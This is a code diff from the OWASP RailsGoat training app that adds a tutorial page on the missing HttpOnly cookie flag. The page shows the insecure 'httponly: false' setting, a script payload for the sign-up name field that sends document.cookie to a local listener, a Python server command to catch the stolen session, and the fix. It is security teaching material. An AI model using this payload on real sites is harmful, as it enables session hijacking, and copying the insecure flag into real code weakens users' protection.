Merge branch 'master' of https://github.com/OWASP/railsgoat into rails4

app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb

@@ -0,0 +1,93 @@
+<div class="widget">
+    <div class="widget-header">
+      <div class="title">
+        <span class="fs1" aria-hidden="true" data-icon="&#xe092;"></span> A2 - Broken Authentication and Session Management - Lack of HttpOnly Flag
+      </div>
+    </div>
+    <div class="widget-body">
+      <div id="accordion1" class="accordion no-margin">
+        <div class="accordion-group">
+          <div class="accordion-heading">
+            <a href="#collapseHttpOnlyOne" data-parent="#accordion1" data-toggle="collapse" class="accordion-toggle">
+              <i class="icon-info icon-white">
+              </i>
+              Description
+            </a>
+          </div>
+          <div class="accordion-body in collapse" id="collapseHttpOnlyOne" style="height: auto;">
+            <div class="accordion-inner">
+        		The HttpOnly flag prevents access to the document.cookie attribute of the DOM via JavaScript. Helpful for limiting the impact of Cross-Site Scripting as it relates to session theft.
+            </div>
+          </div>
+        </div>
+        <div class="accordion-group">
+          <div class="accordion-heading">
+            <a href="#collapseHttpOnlyTwo" data-parent="#accordion1" data-toggle="collapse" class="accordion-toggle">
+              <i class="icon-bug icon-white">
+              </i>
+              Bug
+            </a>
+          </div>
+          <div class="accordion-body collapse" id="collapseHttpOnlyTwo" style="height: 0px;">
+            <div class="accordion-inner">
+				<p class="desc">
+					By default, Ruby on Rails protects its' cookies with the HttpOnly flag. However, it is possible to disable this security protection and is not recommended. You can disable this protection using the flag highlighted below. This is an insecure and unnecessary change.
+				</p>	
+       			<pre class="ruby">
+Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_session', <span style="background:yellow">httponly: false</span>
+				</pre>
+            </div>
+          </div>
+        </div>
+        <div class="accordion-group">
+          <div class="accordion-heading">
+            <a href="#collapseHttpOnlyThree" data-parent="#accordion1" data-toggle="collapse" class="accordion-toggle">
+              <i class="icon-lightning icon-white">
+              </i>
+              Solution
+            </a>
+          </div>
+          <div class="accordion-body collapse" id="collapseHttpOnlyThree" style="height: 0px;">
+            <div class="accordion-inner">
+			  <p><b>Lack of the HttpOnly Flag - ATTACK</b></p>
+	        	<p class="desc">
+				  Navigate to the sign-up page, sign up as a user, but in the first name field, enter:
+				  <pre class="ruby">
+					&lt;script&gt;document.location=&quot;http://localhost:8000/&quot; + document.cookie &lt;/script&gt;
+				  </pre>
+				  <p class="desc">
+				  	Additionally, fire up Python's SimpleHTTPServer module using the following command:
+				  </p>
+				  <pre class="ruby">
+					$ python -m SimpleHTTPServer
+				  </pre>	
+				  <p class="desc">
+				     Now authenticate to the application as the user you just created, you'll be redirected, now review the terminal tab that has the python server running. You'll notice that you see a GET request with the user's session in the request path. This means you have now grabbed the user's session via Cross-Site Scripting.
+				  </p>
+			   </p>
+              <p><b>Lack of the HttpOnly Flag - SOLUTION</b></p>
+        	  	<p class="desc">
+				  Keep the default configuration "as-is" and do not make this change. If this exists in your code base, remove it.
+				</p>
+            </div>
+          </div>
+        </div>
+    <div class="accordion-group">
+          <div class="accordion-heading">
+            <a  style="background-color: rgb(181, 121, 158)" href="#collapseHttpOnlyFour" data-parent="#accordion1" data-toggle="collapse" class="accordion-toggle">
+              <i class="icon-aid icon-white">
+              </i>
+              Hint
+            </a>
+          </div>
+          <div class="accordion-body collapse" id="collapseHttpOnlyFour" style="height: 0px;">
+            <div class="accordion-inner">
+        <p class="desc">
+         Can JavaScript interact with my session cookie?
+        </p>
+             </div>
+          </div>
+        </div>
+      </div>
+    </div>
+</div>

app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb

@@ -67,7 +67,7 @@
           </div>
           <div class="accordion-body collapse" id="collapseCompThree" style="height: 0px;">
             <div class="accordion-inner">
-              <p><b>Lack of Password Complexity - SOLUTION</b></p>
+              <p><b>Insecure Timing Attacks - SOLUTION</b></p>
         <p>
         Within app/models/user.rb:
         </p>

app/views/tutorials/broken_auth.html.erb

@@ -15,6 +15,11 @@
           <%= render :partial => ("layouts/tutorial/broken_auth_sess/insecure_compare")%>
         </div> <!-- End Span12-->
     </div>
+    <div class="row-fluid">
+        <div class="span12">
+          <%= render :partial => ("layouts/tutorial/broken_auth_sess/httponly_flag")%>
+        </div> <!-- End Span12-->
+    </div>
   </div>
 </div>